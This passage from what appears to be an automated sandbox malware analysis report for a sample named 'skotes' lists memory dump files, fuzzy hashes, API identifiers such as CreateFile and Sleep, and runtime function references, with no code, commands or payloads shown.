                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                            • Opcode ID: f17dc7a13eebd3d37ff1602fdd8a200be8c18a44419bdc1c722ad74bf8ec8ccb
                                                                                                                                            • Instruction ID: 4f39a8e153c12387c2da36db6963be3ecf1d977574413fdb2440aba3395f53b2
                                                                                                                                            • Opcode Fuzzy Hash: f17dc7a13eebd3d37ff1602fdd8a200be8c18a44419bdc1c722ad74bf8ec8ccb
                                                                                                                                            • Instruction Fuzzy Hash: B0D0923214120DBBDF129E84DD06EDA3BAAFB88754F014140BE1C66120C732E832EB94
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                            • Opcode ID: 72297997d610c70a30b1b9468b2b90e059ea493d99cdc952c799e38a3a2be86c
                                                                                                                                            • Instruction ID: 41e953eadf556c9c824ba17bbbf8f3305f50b98e849af0fadd36105c1d254b5e
                                                                                                                                            • Opcode Fuzzy Hash: 72297997d610c70a30b1b9468b2b90e059ea493d99cdc952c799e38a3a2be86c
                                                                                                                                            • Instruction Fuzzy Hash: 01F0A471E10614ABC715BB789E07B1EBBB4EB06B60FC00759F822673E5EB741A0547D2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2890461409.0000000005330000.00000040.00001000.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_5330000_skotes.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 75a1dc3d5eaf51d5888a0acbd12297036dd996bd50562b3cd123982b3b2294d5
                                                                                                                                            • Instruction ID: 467c035e43d51ecbc8bb465274c9a0c52073a86e9b59cc924782281245cba501
                                                                                                                                            • Opcode Fuzzy Hash: 75a1dc3d5eaf51d5888a0acbd12297036dd996bd50562b3cd123982b3b2294d5
                                                                                                                                            • Instruction Fuzzy Hash: 1A21F8EB24C1107DE34AD4955B5FBFA2F9FE6D33303308426F44389D42E2994A4A1272
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2890461409.0000000005330000.00000040.00001000.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_5330000_skotes.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: db383d5a69474f2e0d40fe61e93abee3e57fa81a230a3a351288bd7486e4c453
                                                                                                                                            • Instruction ID: c1c8f9718fb5bf4dac9216f2248ed636e0f648c66b1ebe639152e8cf3f8252b3
                                                                                                                                            • Opcode Fuzzy Hash: db383d5a69474f2e0d40fe61e93abee3e57fa81a230a3a351288bd7486e4c453
                                                                                                                                            • Instruction Fuzzy Hash: 0A210BEB24C110BDE34AD4461B5FAFB7B9FE6D37303308426F447C9D16E2994A5A1171
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2890461409.0000000005330000.00000040.00001000.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_5330000_skotes.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 9fdf0788d55c2752edd61ad69a83b1b7149253619c43b15edf6e3841607784e0
                                                                                                                                            • Instruction ID: 097e64f606918ff4bbdc98d7ff02ed8c01476f415a827d70fabca843d61fa629
                                                                                                                                            • Opcode Fuzzy Hash: 9fdf0788d55c2752edd61ad69a83b1b7149253619c43b15edf6e3841607784e0
                                                                                                                                            • Instruction Fuzzy Hash: 9611D6EB24C114BDE24AD4466B5FAFB6B9FE6E63303308526F443C5D42D2990A9D5232
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2890461409.0000000005330000.00000040.00001000.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_5330000_skotes.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 5bacbe832e040b89a92013eae1e3ac3eaba24a95c65b772d6b8adf3889da666e
                                                                                                                                            • Instruction ID: afd0e1e4b0f419ae711d87c05ca7ad0161bd793ade4aae85e4156d8e78513209
                                                                                                                                            • Opcode Fuzzy Hash: 5bacbe832e040b89a92013eae1e3ac3eaba24a95c65b772d6b8adf3889da666e
                                                                                                                                            • Instruction Fuzzy Hash: 2F11E9EB24C120BDE34AD4862B5FAFA6B9FE5D33303308027F407C9D0292994A9D5272
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2890461409.0000000005330000.00000040.00001000.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_5330000_skotes.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 6fbe6a2a2582bb3fd0faff61bcdd1bf941cba06ceb0b59633247aa5b8a1a3fe8
                                                                                                                                            • Instruction ID: 05f4f3a218cbbba12100e3e7121d00b34ce7d778639dcf0745102e86958aab82
                                                                                                                                            • Opcode Fuzzy Hash: 6fbe6a2a2582bb3fd0faff61bcdd1bf941cba06ceb0b59633247aa5b8a1a3fe8
                                                                                                                                            • Instruction Fuzzy Hash: B3110ABB20C214BEE34AD5565A9AAFA7B9FA6D3330730806AF003C6D42D25A465E5131
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2890461409.0000000005330000.00000040.00001000.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_5330000_skotes.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 074759af9813d2bafa1b4fcce4fe8486dcec2b6a419726b446e34f07c636a248
                                                                                                                                            • Instruction ID: ef3e0c1a1470ccb896424f3c6722d44a762686b6ba7d3f7aba802cf51508e9ab
                                                                                                                                            • Opcode Fuzzy Hash: 074759af9813d2bafa1b4fcce4fe8486dcec2b6a419726b446e34f07c636a248
                                                                                                                                            • Instruction Fuzzy Hash: 0D11B6EB24C110BDE34BD4562B5BAFA7B9FA6E3330330812BF447C5D4292991B9D5232
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2890461409.0000000005330000.00000040.00001000.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_5330000_skotes.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 429ddd5927a6f20c8cf666b859c9735f6e400325c339b891a3d36ed6e0cf8ff9
                                                                                                                                            • Instruction ID: 45d7053a0c1395b06d6cda6f971c07b1dea7acceee8a8d6622238201af9566d7
                                                                                                                                            • Opcode Fuzzy Hash: 429ddd5927a6f20c8cf666b859c9735f6e400325c339b891a3d36ed6e0cf8ff9
                                                                                                                                            • Instruction Fuzzy Hash: A601B9AB248510BDE24AD4462B5FBFB6B9FA6D33307308017F407C5D419199069D5132
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2890461409.0000000005330000.00000040.00001000.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_5330000_skotes.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 562f1c4d91b3729760e664eda773b6c8c4873fb9f4fbe0b218e76185fa63cb8e
                                                                                                                                            • Instruction ID: f02ad7199620134900080a9dbc7bd898ba9b8b7052372ac4926a8c1d27008100
                                                                                                                                            • Opcode Fuzzy Hash: 562f1c4d91b3729760e664eda773b6c8c4873fb9f4fbe0b218e76185fa63cb8e
                                                                                                                                            • Instruction Fuzzy Hash: 5B01B5AB208610BDE24AD5466B5EAFA6B9FE5E33303308526F043C5D02D6990A9D5231
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2890461409.0000000005330000.00000040.00001000.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_5330000_skotes.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c3e577cdcc632b880f02cb1f7180532ae2550ab9d590b8cf2525f4fad5cd8a25
                                                                                                                                            • Instruction ID: 4b693353f7d1b1eb406283fca29b43fd7f3aed786f5b2f7371a0a9d583bda186
                                                                                                                                            • Opcode Fuzzy Hash: c3e577cdcc632b880f02cb1f7180532ae2550ab9d590b8cf2525f4fad5cd8a25
                                                                                                                                            • Instruction Fuzzy Hash: A701F9B720C744AEE306D1566B5EABA7F5ED6E2230730886FF403D6C43D295064D9235
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2890461409.0000000005330000.00000040.00001000.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_5330000_skotes.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: ad1c849f73bda8f0879986eaf0b8ee2a82d454fe2c7a1036b054a6ee0b096f78
                                                                                                                                            • Instruction ID: 9a1a0e2c5590b494b09374fb8f71353018cede1ce816113f6a5bb2c67e9aec53
                                                                                                                                            • Opcode Fuzzy Hash: ad1c849f73bda8f0879986eaf0b8ee2a82d454fe2c7a1036b054a6ee0b096f78
                                                                                                                                            • Instruction Fuzzy Hash: 01F08CAB248610ACE209D1462B1FEFB6B9FA6E2630330852BF04399C429299174E6131
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2890461409.0000000005330000.00000040.00001000.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_5330000_skotes.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: e0ff9b978f7524458ed64aaa4c7fcb32bf09ef0fdf1fe5887675eeadf4032fb2
                                                                                                                                            • Instruction ID: dd21056242d66aefd1d3b59440e19d43d73cc6eab9c659ed481af46872a70865
                                                                                                                                            • Opcode Fuzzy Hash: e0ff9b978f7524458ed64aaa4c7fcb32bf09ef0fdf1fe5887675eeadf4032fb2
                                                                                                                                            • Instruction Fuzzy Hash: D6F0C8EB30C610BDF209D1463B1EABB6B9FE5E2230330856BF003D5C42D599074D5135
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2890461409.0000000005330000.00000040.00001000.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_5330000_skotes.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 1ad9ef74c6475adc18f9ea437c3ab6e3e3e58ef47a7263f5a90d20d8c89110e9
                                                                                                                                            • Instruction ID: f3024bd29ac0e18febe0568d2b1a597bcc1cc653562bc6c4456a80f84ed4ef8e
                                                                                                                                            • Opcode Fuzzy Hash: 1ad9ef74c6475adc18f9ea437c3ab6e3e3e58ef47a7263f5a90d20d8c89110e9
                                                                                                                                            • Instruction Fuzzy Hash: B8F05EBB34C610BDF206D5466B1AEBBA75FE5E2630330C42AF003C6942D699064E6131
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2890461409.0000000005330000.00000040.00001000.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_5330000_skotes.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 7cf13a7fd4b7aa8f75dffba9b093aa489a618a622ed4f740b68a61913c21bf15
                                                                                                                                            • Instruction ID: 99598014659cb42a7dd4ebb97d88778b6fd904dadcd43aca0af5054cc1fc6d82
                                                                                                                                            • Opcode Fuzzy Hash: 7cf13a7fd4b7aa8f75dffba9b093aa489a618a622ed4f740b68a61913c21bf15
                                                                                                                                            • Instruction Fuzzy Hash: AAF0E9FB35C5207DE209D5426B5E9FB6B5FD5D6230331841BF003C6906969A064E5135
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2890461409.0000000005330000.00000040.00001000.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_5330000_skotes.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 23361340a22eb7a318b005cdfd926e49672822e395fc031f2568b0fd75cbf109
                                                                                                                                            • Instruction ID: 19c33852d27e4ab8ba26c021cc80e64504a292990a9d68e3851e8a7647e1818b
                                                                                                                                            • Opcode Fuzzy Hash: 23361340a22eb7a318b005cdfd926e49672822e395fc031f2568b0fd75cbf109
                                                                                                                                            • Instruction Fuzzy Hash: A9F027F730C6107DF209D4966B1EAFB6B5FE1D2630331C52BF003C6802E29A064E1131
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2890461409.0000000005330000.00000040.00001000.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_5330000_skotes.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: ea43c63bf530a8736b8ab665cd1f683e4f6f394ce15160a9b80be975eefd1dbc
                                                                                                                                            • Instruction ID: da000c085129f4e6fa076bc4b53f43ad0179e2e5a3502cf0472459b3d7b3562c
                                                                                                                                            • Opcode Fuzzy Hash: ea43c63bf530a8736b8ab665cd1f683e4f6f394ce15160a9b80be975eefd1dbc
                                                                                                                                            • Instruction Fuzzy Hash: 50E0E5E73082047DF101E49627199FB679FE2E2330330C52BF003C5842C2A9058E5135
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2890461409.0000000005330000.00000040.00001000.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_5330000_skotes.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 9d03cda47889c34114e14b4666902e44ec23f2aa0e2e7cb3a0975f50f08ab9d2
                                                                                                                                            • Instruction ID: a3927df87eee58e052798db2eda00305d5592523b9f82e953155a1842202daca
                                                                                                                                            • Opcode Fuzzy Hash: 9d03cda47889c34114e14b4666902e44ec23f2aa0e2e7cb3a0975f50f08ab9d2
                                                                                                                                            • Instruction Fuzzy Hash: 31E0DFE32181503DA24284862A44EFB2B9EE9D3631330C86AF002C6807D69E4A0BA231
                                                                                                                                            APIs
                                                                                                                                            • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00AE0F16
                                                                                                                                            • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00AE0F62
                                                                                                                                              • Part of subcall function 00AE265D: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 00AE2750
                                                                                                                                            • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00AE0FCE
                                                                                                                                            • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00AE0FEA
                                                                                                                                            • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00AE103E
                                                                                                                                            • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00AE106B
                                                                                                                                            • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00AE10C1
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
